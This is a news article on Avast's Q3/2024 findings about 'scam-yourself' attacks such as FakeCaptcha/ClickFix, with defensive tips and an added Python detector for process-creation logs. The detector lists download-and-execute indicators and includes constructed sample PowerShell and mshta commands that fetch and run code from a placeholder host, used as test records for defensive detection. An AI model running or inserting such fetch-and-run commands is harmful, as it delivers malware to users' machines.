Imagine someone handing you a gun and asking you to shoot your own foot for a handsome reward. Will you do it? Most unlikely. However, this is exactly what is happening in cyberspace. One of the most alarming trends is the rise of 'scam-yourself attacks'—an advanced social engineering tactic that tricks users into compromising their own systems.
While various scams continued to dominate the September quarter, other serious threats—including malvertising, ransomware, droppers, and data-stealing malware—also surged ahead. Many of these threats remain closely linked to scams, underscoring the relentless evolution of cybercriminal tactics.
In its Gen Q3/2024 Threat Report, security software provider Avast says that in the September quarter alone it protected over 2 million users from a variant called FakeCaptcha, which mimics CAPTCHA (completely automated public Turing test to tell computers and humans apart) prompts to deliver malware. "With a staggering 614% increase of these scam-yourself attacks quarter-over-quarter, social engineering (psychological manipulation tactics) continues to be one of the most dangerous tools in the cybercriminal arsenal."
"Data stealing malware also increased on mobile devices in the third quarter (Q3) of 2024. Financial data theft by banking malware saw a 60% surge, with attacks like Rocinante targeting users in Brazil, while new threats like TrickMo and Octo2 emerged in Europe. Spyware also rose sharply, with a 166% spike driven by NGate, an advanced spyware targeting NFC data for ATM withdrawals. A common denominator for the main mobile threats seen this quarter is their delivery via malicious SMS messages," Avast says.
As we are witnessing, the landscape of cyberattacks continues to evolve and become more dangerous for the ordinary end user. Gone are the days when malware simply hid in a suspicious email attachment or a shady download.
Avast says attackers are now using your curiosity and urgency to fix an issue against you. "They have weaponised what seem like harmless instructions to lure you in, and by the time you realise what is happening, it is already too late. Whether it is through seemingly helpful tutorials or fake update prompts, cybercriminals are making you their accomplice."
Many users (still) love to download and install cracked or pirated software or apps on their devices. These files are usually shared as a zip archive (compressed to a smaller size, with the contents restored intact on extraction). When the archive is unzipped, you will find a few files, including a 'readme.txt' that is supposed to contain 'instructions' for using the cracked software. A typical last line in that readme is "Disable your antivirus for this software to work properly." That line is the tell: the bundled program has already been detected, and the readme is asking you to suppress the detection. Once you comply, the malware installs with ease, because you have left the door open and sent the sentry (the antivirus) away.
Another trick in the cybercriminals' playbook involves video tutorials. The video walks you through the process of installing software, but when you click the link in the comments to download it, you are downloading malware instead. What started as a guide to help you ends with your device compromised. The worst part? You are the one who clicked, copied, and executed the threat.
The same applies to the many 'fix-it' tutorials and update prompts found on the web. Some are fake guides that mislead you into performing steps that ultimately compromise your own device; others prompt you to download malware under the guise of updating your software or a device driver.
Many websites want to ensure the user is a human, not a bot. How do they do it? They use a CAPTCHA, which usually means the user has to tick the box next to "I'm not a robot". Nobody thinks twice before clicking on that box. Cybercriminals know this and created FakeCaptcha, a variant of ClickFix, designed to resemble a real CAPTCHA and to trick you into following steps that lead straight to infection.
After clicking 'I am not a robot', the page quietly copies a script to your clipboard and then instructs you to paste it into a system prompt and run it. Nothing is exploited inside the browser; the victim launches the command, so on the machine it looks like any other user-initiated action. Following these instructions results in malware silently taking over your system. "The CAPTCHA looks real, but the consequences are all too dangerous. What is happening behind the scenes is that the script acts as a dropper—downloading further malware onto your system, often the infamous Lumma Stealer, one of the most advanced information stealers out there today," Avast says.
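As an added example (not code from this article or from Avast), here is a small detection script a defender could run over process-creation telemetry to catch the last step of a FakeCaptcha/ClickFix chain: the moment the victim pastes the clipboard contents into a system prompt and a scripting host starts under the user's own shell. It assumes Sysmon Event ID 1-style records with ParentImage, Image and CommandLine fields; the interpreter and launcher lists and the indicator patterns are assumptions of this example, and the sample events are constructed, not captured from a real host.

```python
"""Flag ClickFix / FakeCaptcha-style executions in process-creation telemetry.

Added example for this article; it is not Avast's code. It assumes Sysmon
Event ID 1-style records (ParentImage, Image, CommandLine). The event
records at the bottom are constructed, not captured from a real host.
"""
import re
from typing import Dict, List, Tuple

# Interpreters a pasted one-liner usually lands in (assumed shortlist).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# Parents that mean "a human typed or pasted this": the Run dialog and
# File Explorer start children under explorer.exe; a terminal the user
# opened shows up as the terminal host (assumed list).
USER_LAUNCHERS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}

# Indicators commonly seen in the pasted command (assumed patterns).
INDICATORS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"https?://", re.I), "remote url"),
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.I),
     "download and execute"),
    # The pasted text often carries reassuring wording so the dialog looks
    # harmless; treating it as an indicator is an assumption of this example.
    (re.compile(r"not\s+a\s+robot|verify\s+you\s+are\s+human|captcha", re.I), "captcha bait text"),
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def indicators_for(cmdline: str) -> List[str]:
    """List every indicator label whose pattern matches the command line."""
    return [label for pattern, label in INDICATORS if pattern.search(cmdline)]


def is_clickfix_like(event: Dict[str, str]) -> Tuple[bool, List[str]]:
    """Decide whether one process-creation event looks like a pasted ClickFix command.

    Rule: an interpreter started from a user launcher whose command line
    either reaches out to a remote URL or shows at least two indicators.
    """
    if basename(event["ParentImage"]) not in USER_LAUNCHERS:
        return False, []
    if basename(event["Image"]) not in INTERPRETERS:
        return False, []
    hits = indicators_for(event["CommandLine"])
    flagged = "remote url" in hits or len(hits) >= 2
    return flagged, hits


def detect_clickfix(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map EventId -> indicator labels for every event the rule flags."""
    results: Dict[str, List[str]] = {}
    for event in events:
        flagged, hits = is_clickfix_like(event)
        if flagged:
            results[event["EventId"]] = hits
    return results


# Constructed sample records (Sysmon Event ID 1 fields, trimmed).
SAMPLE_EVENTS = [
    {  # pasted from a fake CAPTCHA page: hidden window, fetch-and-run, bait comment
        "EventId": "1001",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://example.invalid/v.txt')\" # I am not a robot",
    },
    {  # mshta pulling a remote HTA straight from the Run dialog
        "EventId": "1002",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta http://example.invalid/verify",
    },
    {  # an administrator listing a directory: same parent, no indicators
        "EventId": "1003",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -Command Get-ChildItem C:\\Users",
    },
    {  # same download, but launched by a service: out of scope for this rule
        "EventId": "1004",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -c \"iwr http://example.invalid/u.ps1\"",
    },
]

if __name__ == "__main__":
    for event_id, hits in detect_clickfix(SAMPLE_EVENTS).items():
        print(event_id, "->", ", ".join(hits))
```

The rule keys on the parent process because, in this attack, the browser never runs anything: the victim does, so the event is indistinguishable from any other interactively launched command unless you look at what was launched. Pairing the user launcher with a remote URL or with two or more indicators keeps ordinary admin one-liners (record 1003) out of the alert queue, while record 1004 shows the rule deliberately ignoring a non-interactive launch, which belongs to a separate rule for scheduled tasks and services.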
In short, in scam-yourself attacks users unintentionally take actions that either compromise their own security or lead them to unknowingly assist the attacker in perpetrating fraud. It happens because the user fails to recognise the warning signs of a scam or is tricked into thinking the request is legitimate.
According to Avast, scam-yourself attacks have become a cybercriminal's dream in a world where we rely on quick fixes and familiar online prompts. Users unknowingly follow instructions that do the attackers' bidding for them, whether through fake CAPTCHAs, misleading YouTube tutorials, or cleverly disguised readme files.
"What is more troubling is how effortlessly these scams blend into our daily digital lives. We have grown so used to CAPTCHAs and quick-fix guides that we often forget to stop and question them. Also, almost every application needs to be up-to-date and if it is not, users commonly see screens and dialogues prompting the (mandatory) update. In the hands of cybercriminals, our trust in these familiar formats becomes their most powerful weapon," Avast says.
As the scam-yourself attacks evolve, one constant remains: these campaigns thrive on user deception and manipulation. The question is not whether these fake tutorials will persist but how we will recognise and navigate them before it is too late.
Here are a few suggestions to protect you from shooting yourself in the foot!
1. Be sceptical: Avoid clicking on links or opening attachments from unfamiliar sources. Never paste and run a command because a web page, a CAPTCHA prompt, a tutorial or a readme told you to; a genuine CAPTCHA never needs you to run anything on your machine.
2. Use strong, unique passwords: Ensure you use strong, unique passwords for all online accounts. Enable multi-factor authentication (MFA) wherever possible for an extra layer of protection.
3. Use antivirus and anti-phishing tools: Keep your device's security software up to date and use anti-phishing tools in your browser to help block fraudulent websites and malicious links. Do not switch protection off because an installer or readme asks you to; that request is itself a warning sign.
4. Avoid remote access requests: Be cautious if anyone asks to remotely access your computer or device, particularly if they claim to be from a technical support company or government entity. Legitimate organisations do not contact you unsolicited to ask for access to your device.
5. Trust your instincts: If something feels off or seems too good to be true, it is worth taking a step back to reconsider the situation. Scammers often rely on emotional manipulation to rush you into decisions, so always trust your gut and think critically before proceeding.
By staying aware of common scams and practising caution when interacting online, you can significantly reduce the risk of becoming a victim of scam-yourself attacks.
Stay Alert, Stay Safe!